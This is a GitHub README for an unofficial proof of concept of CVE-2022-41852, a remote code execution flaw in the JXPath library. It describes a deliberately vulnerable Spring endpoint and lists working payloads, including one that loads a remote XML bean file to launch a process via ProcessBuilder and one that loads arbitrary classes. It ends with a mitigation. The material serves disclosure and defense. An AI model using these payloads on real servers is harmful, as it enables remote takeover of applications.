Skip to content

Warxim/CVE-2022-41852

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
src/main
src/main
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

Remote Code Execution in JXPath Library (CVE-2022-41852) Proof of Concept

CVE-2022-41852 allows attackers to execute code on the application server.

You can read more about this vulnerability here:

Note: I am not an author of this CVE. I have only created this proof of concept.

Useful Links

Vulnerability Description

JXPath library has support for running functions in XPath expressions (see Official User Guide).

For example, methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let user send input into the path parameter.

PoC Description

This PoC starts simple Spring server with two endpoints:

  • /vulnerable-example?path=[path]
  • /secure-example?path=[path]

These endpoints have only one query parameter "path".

Possible Request URLs

Following requests will work fine (will not cause any problems):

Following requests will cause code to be executed:

Example Payloads

Example payloads to detect CVE-2022-41852:

  • java.lang.System.exit(42)
  • java.lang.Thread.sleep(10000)
  • /|java.lang.System.exit(42)
  • |java.lang.System.exit(42)

There might be various ways to execute commands. One of them is using Spring's ClassPathXmlApplicationContext:

  • org.springframework.context.support.ClassPathXmlApplicationContext.new("https://warxim.com/calc.xml")

In the XML file, you can define bean configuration, for example, you can create instance of ProcessBuilder and run specified command on the server by initializing the bean using start() method. In the following example, calculator will be opened on Windows machine:

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="commandRunner" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value><![CDATA[calc]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

There is also a way to load new classes by traversing the context bean, for example, the following code will load class com.warxim.dangerous.DangerousClass, create its instance and call method run("warxim"):

JXPathContext context = JXPathContext.newContext(new Data());
String jxPath = "run(newInstance(loadClass(getClassLoader(getClass(/)), \"com.warxim.dangerous.DangerousClass\")), \"warxim\")"
Object result = context.getValue(jxPath);

Notice that we have to call the object methods by putting the object that contains them as a first parameter.

Workaround for CVE-2022-41852

It is possible to disable functions in JXPathContext by setting functions field to empty FunctionLibrary.

// Create path context for person object
var pathContext = JXPathContext.newContext(person);

// Set empty function library
pathContext.setFunctions(new FunctionLibrary());

// getValue will throw org.apache.commons.jxpath.JXPathFunctionNotFoundException
return pathContext.getValue(path);

Note: It will disable all functions, so even functions like size() will not be available.

Fix

The fix is being developed, see apache/commons-jxpath#26

About

CVE-2022-41852 Proof of Concept (unofficial)

hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

Topics

security proof-of-concept hacking penetration-testing rce vulnerability pentesting cve remote-code-execution cve-2022-41852 jxpath

Resources

Readme
Activity

Stars

74 stars

Watchers

3 watching

Forks

17 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages